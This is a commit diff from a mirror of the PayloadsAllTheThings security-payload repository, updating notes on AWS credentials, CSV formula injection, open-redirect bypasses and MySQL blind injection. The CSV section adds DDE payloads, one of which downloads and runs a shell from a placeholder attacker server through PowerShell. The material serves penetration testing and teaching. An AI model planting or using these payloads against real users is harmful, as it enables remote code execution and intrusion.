daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

SQL wildcard '_' + CSV injection reverse shell

patch-1
Swissky 2018-12-26 01:02:17 +01:00
parent bd97c0be86
commit e480c9358d
6 changed files with 31 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
AWS Amazon Bucket S3/README.md
View File

@ -26,7 +26,15 @@ AWSSecretKey=[ENTER HERE YOUR KEY]
aws configure --profile nameofprofile
```
then you can use *--profile nameofprofile* in the aws command
then you can use *--profile nameofprofile* in the aws command.
Alternatively you can use environment variables instead of creating a profile.
```bash
export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
```
## Open Bucket
@ -163,4 +171,5 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
* https://digi.ninja/projects/bucket_finder.php
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
* [FlAWS.cloud Challenge based on AWS vulnerabilities](http://flaws.cloud/)
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)

15
CSV injection/README.md
View File

@ -1,4 +1,4 @@
# CSV Excel formula injection
# CSV Injection (Formula Injection)
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
@ -9,12 +9,15 @@ Basic exploit with Dynamic Data Exchange
```powershell
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
```
Technical Details of the above payload:
cmd is the name the server can respond to whenever a client is trying to access the server
/C calc is the file name which in our case is the calc(i.e the calc.exe)
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
- `cmd` is the name the server can respond to whenever a client is trying to access the server
- `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
Any formula can be started with
@ -29,4 +32,6 @@ Any formula can be started with
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)

2
Methodology and Resources/Active Directory Attack.md
View File

@ -16,7 +16,7 @@
* [Pass-the-Hash](#pass-the-hash)
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
* [NTLMv2 hashes relaying](#ntlv2-hashes-relaying)
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains)
* [Privilege Escalation](#privilege-escalation)

1
Open redirect/README.md
View File

@ -48,6 +48,7 @@ Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
Using "%E3%80%82" to bypass "." blacklisted character
```powershell
/?redir=google。com
//google%E3%80%82com
```

BIN
SQL injection/Images/wildcard_underscore.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 108 KiB

8
SQL injection/MySQL Injection.md
View File

@ -91,6 +91,14 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```
## MYSQL Blind with wildcard character
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
```sql
SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
```
## MYSQL Time Based
```sql